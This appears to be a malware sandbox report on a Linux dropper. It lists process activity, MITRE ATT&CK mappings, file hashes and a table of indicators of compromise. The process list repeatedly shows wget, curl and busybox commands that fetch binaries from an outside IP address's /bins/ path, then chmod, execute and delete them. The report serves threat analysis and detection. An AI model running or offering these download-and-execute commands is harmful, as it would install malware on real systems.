chmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- File and Directory Permissions Modification
PID:1658

/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- Executes dropped EXE
PID:1659

/bin/rm
rm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:1660

/usr/bin/wget
wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:1661

/usr/bin/curl
curl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- Writes file to tmp directory
PID:1662

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:1663

/bin/chmod
chmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- File and Directory Permissions Modification
PID:1664

/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- Executes dropped EXE
PID:1665

/bin/rm
rm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:1666

/usr/bin/wget
wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:1667

/usr/bin/curl
curl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- Writes file to tmp directory
PID:1668

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:1669

/bin/chmod
chmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- File and Directory Permissions Modification
PID:1670

/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- Executes dropped EXE
PID:1671

/bin/rm
rm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:1672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw	1509	ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1	1515	h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px	1521	FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj	1527	EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc	1533	11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch	1539	Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT	1545	K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa	1551	weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE	1557	E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo	1563	k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8	1569	tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u	1575	RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD	1581	SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ	1587	ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8	1593	tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u	1599	RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD	1605	SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ	1611	ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw	1617	ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1	1623	h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc	1629	11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch	1635	Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT	1641	K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa	1647	weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE	1653	E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo	1659	k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px	1665	FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj	1671	EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads